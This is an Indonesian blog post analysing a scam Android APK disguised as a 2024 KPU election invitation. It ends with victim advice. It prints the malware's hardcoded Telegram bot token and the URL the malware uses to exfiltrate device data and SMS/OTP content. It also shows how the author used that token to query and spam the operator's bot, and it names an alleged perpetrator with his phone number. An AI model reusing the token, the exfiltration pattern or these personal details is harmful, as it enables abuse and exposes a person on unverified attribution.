Pada artikel berikut saya akan membongkar aplikasi Scammer UNDANGAN KPU 2024, Saya mendapatkan sebuah pesan yang dimana si pengirim mengirimkan sebuah file apk dengan nama UNDANGAN KPU 2024-1.apk
Baca Juga: Mengamankan Google Maps API Key pada Aplikasi
Selanjutnya saya melakukan decompile apk tersebut dengan JADX GUI untuk melihat informasi code yang ada diaplikasi tersebut.
Pada folder com/example.myapplication/ terdapat hardcode yang tidak di obfuscate sehingga saya dapat melihat isi yang ada didalam file tersebut seperti dibawah ini:
String token = "6702332277:AAHc3mAZKICPpzSGWSTV_LbgeS4kgwxlZsk"; String id_pelanggan = ""; String id_saya = "5894432707"; String send_sms = "y"; String no_hp = "082184349118";
Setelah itu saya melihat ada beberapa permission yang digunakan pada aplikasi tersebut pada AndroidManifest.xml
yang artinya jika user mengizinkan permintaan tersebut Ketika aplikasi dijalankan, memungkinan aplikasi tersebut mengambil isi sms, melakukan panggilan telephone, mengirimkan sms, membaca pesan mengambil lokasi dll.
Selain itu juga jika akses diizinkan maupun tidak diizinkan maka aplikasi tersebut akan otomatis memanggil HTTP SERVER Telegram BOT dengan informasi perangkat yang digunakan seperti ID,PRODUSEN, MODEL dsb.
Baca Juga: Tools Scanner Allin one Web based
Fungsinya adalah untuk mengirimkan informasi yang didapat sebelumnya ke pelaku dengan id bot diatas.
Adapun url yang digunakan sebagai berikut:
https://api.telegram.org/bot{token}/sendMessage?parse_mode=markdown&chat_id=" + this.id_saya + "&text=*Aplikasi Terinstall di Perangkat :* _" + this.device
IDENTIFIKASI PELAKU
Karna disini saya menggunakan emulator dan apk tidak bisa dijalankan dengan maksimal saya memutuskan untuk melakukan osint dari http yang dibawa pada aplikasi saat decompile menggunakan jadx.
Sebelumnya saya sudah mendapatkan nomer handphone, id dan token bot telegram yang Dimana saya akan memanfaatkan data tersebut untuk menelusuri lebih lanjut.
Dari url bot telegram tersebut jika diakses menggunakan id dan token hardcode. sebelumnya saya dapat melihat informasi sebagai berikut dengan mengakses http telegram diatas.
https://api.telegram.org/bot6702332277:AAHc3mAZKICPpzSGWSTV_LbgeS4kgwxlZsk/sendMessage?parse_mode=markdown&chat_id=5894432707&text=*Aplikasi%20Terinstall%20di%20Perangkat:+device
Karna disini saya mengakses nya dengan manual jadi info device tidak dapat dikirim dan Saya mendapatkan informasi tambahan sipelaku sebagai berikut:
Firstname bot: Sadabkpu39482bot
Username: Sadabkpu3948irjr2bot
Nama Pelaku: Yuda
Disini juga saya bisa mengirimkan spam pesan secara terus menerus pada bot yang diteruskan ke pelaku tersebut dengan mengakses url berikut:
https://api.telegram.org/bot6702332277:AAHc3mAZKICPpzSGWSTV_LbgeS4kgwxlZsk/sendMessage?chat_id=5894432707&text=Hello%20from%20Telegram%20Bot
CARA KERJA APLIKASI
Ketika aplikasi tersebut diinstall aplikasi tersebut tidak ditampilkan pada homescreen sehingga korban tidak mengetahui jika aplikasi tersebut sedang berjalan dilatar belakang, kemudian dengan hidden nya aplikasi tersebut secara diam-diam aplikasi tersebut merekam aktivitas sikorban dan mengambil data korban seperti contohnya si korban melakukan reset password lalu aplikasi pihak ke 3 mengrimkan OTP rahasia ke nomer user dengan otomatis aplikasi virus tersebut merekam dan mengirimkan informasi tersebut telegram bot yang sudah dibuat si pelaku.
Informasi Pemilik APK
Nama: YUDA
No HP: 082184349118
Username BOT: https://t.me/Sadabkpu3948irjr2bot
Cara Mengatasi Aplikasi Scammer
- Jangan klik tautan apapun jika tidak jelas sumbernya
- Jangan Install aplikasi pada situs yang tidak terpercaya
- Bandingkan pengirim pesan dengan yang akun asli atau palsu
- Jangan memberikan informasi apapun kepada oranglain seperti OTP & Password dll.
- Jika aplikasi sudah terinstall segara lakukan pengecekan pada pengaturan – aplikasi – uninstall aplikasi yang tidak jelas sumbernya
- Verifikasi aplikasi pada situs viruztotal untuk mengecek aplikasi aman atau tidak
PENUTUP
Sekian artikel yang bisa saya bagikan mohon maaf jika ada kekurangan dalam melakukan bongkar aplikasi scammer tersebut dan mohon maaf jika ada kesalahan dalam penulisan artikel semoga bermanfaat terima kasih.